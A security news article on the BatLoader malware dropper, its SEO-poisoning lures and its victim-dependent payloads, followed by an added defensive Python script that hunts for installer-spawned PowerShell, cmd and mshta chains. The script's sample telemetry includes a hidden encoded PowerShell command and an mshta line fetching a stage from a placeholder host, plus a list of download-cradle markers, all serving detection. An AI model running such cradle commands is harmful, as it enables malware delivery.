Researchers Sound Alarm on Dangerous BatLoader Malware Dropper

Published: 23/11/2024   Category: security




BatLoader has spread rapidly to roost in systems globally, tailoring payloads to its victims.



A dangerous new malware loader with features for determining whether it's on a business system or a personal computer has begun rapidly infecting systems worldwide over the past few months.
Researchers at VMware Carbon Black are tracking the threat, dubbed BatLoader, and say its operators are using the dropper to distribute a variety of malware tools, including a banking Trojan, an information stealer, and the Cobalt Strike post-exploit toolkit, on victim systems. The threat actor's tactic has been to host the malware on compromised websites and lure users to those sites using search engine optimization (SEO) poisoning methods.
BatLoader relies heavily on batch and PowerShell scripts to gain an initial foothold on a victim machine and to download other malware onto it. This has made the campaign hard to detect and block, especially in the early stages, analysts from VMware Carbon Black's managed detection and response (MDR) team said in a report released on Nov. 14.
VMware said its Carbon Black MDR team had observed 43 successful infections in the last 90 days, in addition to numerous other unsuccessful attempts where a victim downloaded the initial infection file but did not execute it. Nine of the victims were organizations in the business services sector, seven were financial services companies, and five were in manufacturing. Other victims included organizations in the education, retail, IT, and healthcare sectors.
On Nov. 9, eSentire said its threat-hunting team had observed BatLoader's operator luring victims to websites masquerading as download pages for popular business software such as LogMeIn, Zoom, TeamViewer, and AnyDesk. The threat actor distributed links to these websites via ads that showed up prominently in search engine results when users searched for any of these software products.
The security vendor said that in one late October incident, an eSentire customer arrived at a fake LogMeIn download page and downloaded a Windows installer that, among other things, profiles the system and uses the information to retrieve a second-stage payload.
What makes BatLoader interesting is that it has logic built into it that determines if the victim computer is a personal computer or a corporate computer, says Keegan Keplinger, research and reporting lead with eSentire’s TRU research team. It then drops the type of malware appropriate for the situation.
For example, if BatLoader hits a personal computer, it downloads Ursnif banking malware and the Vidar information stealer. If it hits a domain-joined or corporate computer, it downloads Cobalt Strike and the Syncro remote monitoring and management tool, in addition to the banking Trojan and information stealer.
If BatLoader lands on a personal computer, it will proceed with fraud, infostealing, and banking-based payloads like Ursnif, Keegan says. If BatLoader detects that it's in an organizational environment, it will proceed with intrusion tools like Cobalt Strike and Syncro.
Keegan says eSentire has observed a lot of recent cyberattacks involving BatLoader. Most of the attacks are opportunistic and hit anyone looking for trusted and popular free software tools. 
To get in front of organizations, BatLoader leverages poisoned ads so that when employees look for trusted free software, like LogMeIn and Zoom, they instead land on sites controlled by attackers, delivering BatLoader.
VMware Carbon Black said that while there are several aspects of the BatLoader campaign that are unique, there are also several attributes of the attack chain that resemble the Conti ransomware operation.
The overlaps include an IP address that the Conti group used in a campaign leveraging the Log4j vulnerability, and the use of a remote management tool called Atera that Conti has used in previous operations. 
In addition to the similarities with Conti, BatLoader also has several overlaps with Zloader, a banking Trojan that appears derived from the Zeus banking Trojan of the early 2000s, the security vendor said. The biggest similarities there include the use of SEO poisoning to lure victims to malware-laden websites, the use of Windows Installer for establishing an initial foothold, and the use of PowerShell, batch scripts, and other native OS binaries during the attack chain.
Mandiant was the first to report on BatLoader. In a blog post in February, the security vendor reported observing a threat actor using free productivity apps installation and free software development tools installation themes as SEO keywords to lure users to download sites. 
This initial BatLoader compromise was the beginning of a multi-stage infection chain that provides the attackers with a foothold inside the target organization, Mandiant said. The attackers used every stage to set up the next phase of the attack chain, using tools such as PowerShell, Msiexec.exe, and Mshta.exe to evade detection.
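The article repeatedly points to the same detection opportunity: a Windows Installer process that goes on to spawn PowerShell, batch (cmd.exe) or Mshta.exe, often to fetch a next stage. The following is an added example, not code from the article or from VMware Carbon Black, eSentire or Mandiant, showing how a defender could hunt for that living-off-the-land chain in process-creation telemetry. The event fields mirror Sysmon Event ID 1 (process create) but the events themselves are constructed; the installer and script-host image lists, the ancestry depth, and the download-cradle command-line markers are assumptions chosen for illustration.

```python
"""Hunt for installer -> script-host process chains in constructed process-creation events.

Added example (not from the article or the vendors it cites). Flags any
PowerShell / cmd.exe / mshta.exe process whose ancestry, within a few hops,
includes msiexec.exe, and marks whether its command line looks like a
download cradle or an encoded script. All thresholds and marker lists are
assumptions for illustration, not published detection content.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional

INSTALLER_IMAGES = {"msiexec.exe"}                                   # assumption
SCRIPT_HOST_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}  # assumption
# Heuristic markers for a download cradle or obfuscated script (assumption).
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                  "-enc", "-encodedcommand", "http://", "https://")


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal Sysmon-Event-1-like record (constructed for this example)."""
    pid: int
    ppid: int
    image: str
    command_line: str


def image_name(path: str) -> str:
    """Return the lower-cased file name of an image path (handles \\ and /)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(event: ProcessEvent, by_pid: Dict[int, ProcessEvent],
             max_depth: int = 4) -> List[ProcessEvent]:
    """Walk parent links upward, nearest parent first, up to max_depth hops."""
    chain: List[ProcessEvent] = []
    cur: Optional[ProcessEvent] = by_pid.get(event.ppid)
    while cur is not None and len(chain) < max_depth:
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    return chain


def looks_like_download_cradle(command_line: str) -> bool:
    """True if the command line carries any of the heuristic cradle markers."""
    cl = command_line.lower()
    return any(marker in cl for marker in CRADLE_MARKERS)


def find_installer_spawned_script_hosts(events: List[ProcessEvent],
                                        max_depth: int = 4) -> List[dict]:
    """Return one finding per script host whose ancestry includes an installer."""
    by_pid = {e.pid: e for e in events}
    findings: List[dict] = []
    for e in events:
        if image_name(e.image) not in SCRIPT_HOST_IMAGES:
            continue
        chain = ancestry(e, by_pid, max_depth)
        idx = next((i for i, a in enumerate(chain)
                    if image_name(a.image) in INSTALLER_IMAGES), None)
        if idx is None:
            continue  # no installer among the recent ancestors: not this pattern
        # Path from the installer down to the flagged process, top-down.
        path = [image_name(a.image) for a in reversed(chain[:idx + 1])]
        path.append(image_name(e.image))
        findings.append({
            "pid": e.pid,
            "image": image_name(e.image),
            "installer_pid": chain[idx].pid,
            "chain": path,
            "download_cradle": looks_like_download_cradle(e.command_line),
        })
    return findings


# Constructed sample telemetry: explorer -> msiexec -> cmd (batch) -> powershell,
# plus msiexec -> mshta, and an unrelated interactive PowerShell for contrast.
SAMPLE_EVENTS = [
    ProcessEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcessEvent(200, 100, r"C:\Windows\System32\msiexec.exe",
                 r"msiexec.exe /i C:\Users\u\Downloads\setup.msi /qn"),
    ProcessEvent(300, 200, r"C:\Windows\System32\cmd.exe",
                 r"cmd.exe /c C:\Users\u\AppData\Local\Temp\install.bat"),
    ProcessEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -enc <base64-placeholder>"),
    ProcessEvent(500, 200, r"C:\Windows\System32\mshta.exe",
                 "mshta.exe https://example.invalid/stage2.hta"),  # placeholder host
    ProcessEvent(600, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe Get-Process"),
]

if __name__ == "__main__":
    for f in find_installer_spawned_script_hosts(SAMPLE_EVENTS):
        flag = " [download cradle]" if f["download_cradle"] else ""
        print(f"pid {f['pid']}: {' -> '.join(f['chain'])}{flag}")
```

Walking a few hops of ancestry rather than only the direct parent matters here because the batch layer sits between the installer and the PowerShell stage; a rule keyed on `msiexec.exe` as the immediate parent would see the cmd.exe launch but miss the script that actually pulls the next stage. Treat the cradle markers as triage hints, not verdicts, and tune the image lists to whatever installer and script-host binaries your environment legitimately uses.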
